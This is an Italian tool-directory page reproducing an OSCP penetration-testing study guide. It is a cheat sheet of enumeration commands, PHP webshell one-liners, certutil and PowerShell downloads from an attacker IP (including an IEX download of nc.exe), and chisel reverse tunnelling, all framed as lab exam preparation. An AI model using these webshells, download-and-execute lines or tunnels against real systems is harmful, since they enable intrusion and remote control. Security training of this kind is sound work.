Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
OSCP — Guida allo studio OSCP | Kitploit
Strumenti/GitHubGitHub/rootsecdev/oscp
RicognizioneExploitSfruttamento di Applicazioni WebPost-ExploitSicurezza WebSicurezza di RetePenetration TestingApprendimento e FormazioneRed Teaming
GitHubrootsecdev/oscp

OSCP

Guida allo studio OSCP

42513 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
Condividi

OSCP

Guida allo Studio OSCP

Indice

Enumerazione e Ricognizione

Enumerazione Web

Scansione con Nikto:

root@kitploit:~
nikto -h http://10.10.10.1

Individuazione delle directory con diversi strumenti:

DIRB

root@kitploit:~
dirb http://10.10.10.1

Gobuster

root@kitploit:~
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

Test di Applicazioni Web

Payload XSS: Cheatsheet: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

Test di base dei moduli XSS con listener netcat o server web python

root@kitploit:~

Cross Site Scripting per scaricare cookie in base64. Assicurarsi di codificare l'URL in burp con ctrl + u

root@kitploit:~

Webshell

Riferimento: https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html

Semplice webshell PHP per l'esecuzione di comandi

root@kitploit:~
<?php system($_REQUEST ['cmd']) ?>
root@kitploit:~
<?php system($_GET['cmd']); ?>

Test SNMP

Porta 161 UDP

root@kitploit:~
snmpwalk -c public -v2c 10.129.213.210
root@kitploit:~
snmp-check 10.129.213.210

Test SMB

root@kitploit:~
crackmapexec smb 10.129.70.254 

Rilevamento delle condivisioni anonime aperte

root@kitploit:~
smbclient -L //10.129.70.254

Autenticazione nulla

root@kitploit:~
smbclient -N -L //10.129.70.254

Post Sfruttamento

Scaricare e Trasferire File

Certutil:

root@kitploit:~
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

PowerShell:

root@kitploit:~
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
root@kitploit:~
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"

Inoltro di porte e tunneling

Utilizzo di Chisel:

Esempio di inoltro di porte per rendere disponibile la porta 910 sulla macchina Kali

root@kitploit:~
sulla macchina vittima configurare l'inoltro di porte
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
root@kitploit:~
Sulla macchina Kali di attacco impostare un listener inverso per l'inoltro di porte con chisel
./chisel server --port 5555 --reverse
Scarica lo strumento